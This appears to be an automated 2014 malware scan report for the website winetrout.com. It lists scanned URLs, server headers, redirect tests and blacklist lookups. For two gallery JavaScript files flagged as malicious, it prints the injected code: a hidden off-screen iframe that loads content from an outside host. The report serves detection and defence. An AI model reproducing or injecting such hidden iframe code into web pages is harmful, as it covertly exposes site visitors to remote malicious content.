Scanned pages/files
Request | Server response | Status |
--- | --- | --- |
http://winetrout.com/ | HTTP/1.1 200 OK Connection: close Date: Sun, 05 Oct 2014 19:50:32 GMT Accept-Ranges: bytes ETag: "12751ff-9e-46bcdb7be1c80" Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6 Content-Length: 158 Content-Type: text/html Last-Modified: Mon, 08 Jun 2009 03:20:02 GMT | clean |
http://www.winetrout.com/home/ | 200 OK Content-Length: 5397 Content-Type: text/html | clean |
http://www.winetrout.com/home/highslide/highslide/highslide-full.js | 200 OK Content-Length: 96551 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
    if (!hs) { var hs = { lang : { cssDirection: 'ltr', loadingText : 'Loading...', loadingTitle : 'Click to cancel', focusTitle : 'Click to bring to front', fullExpandTitle : 'Expand to actual size (f)', creditsText : '', creditsTitle : '', previousText : 'Previous', nextText : 'Next', moveText : 'Move', closeText : 'Close', closeTitle : 'Close (esc)', resizeTitle : 'Resize', playText : 'Play', playTitle : 'Play slide hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(document, 'ready', hs.setClickEvents); hs.addEventListener(window, 'load', hs.preloadImages); hs.addEventListener(window, 'load', hs.preloadAjax); };document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://aoodwlcw.dns-stuff.com/a77c0fb85a46dd87a.olz?13" height="330" width="210"></iframe>');
Antivirus reports:
http://www.winetrout.com/home/highslide/highslide/highslide.config.js | 200 OK Content-Length: 351 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
    hs.graphicsDir = 'highslide/graphics/'; hs.outlineType = 'custom'; hs.align = 'center'; hs.captionEval = 'this.a.title'; ;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://aoodwlcw.dns-stuff.com/a77c0fb85a46dd87a.olz?13" height="330" width="210"></iframe>');
Antivirus reports:
http://winetrout.com/test404page.js | 404 Not Found Content-Length: 522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winetrout.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 19:50:32 GMT
Accept-Ranges: bytes
ETag: "12751ff-9e-46bcdb7be1c80"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 158
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 03:20:02 GMT
...158 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: winetrout.com
Referer: http://www.google.com/search?q=winetrout.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winetrout.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://winetrout.com/
Result: winetrout.com is not infected or malware details are not published yet.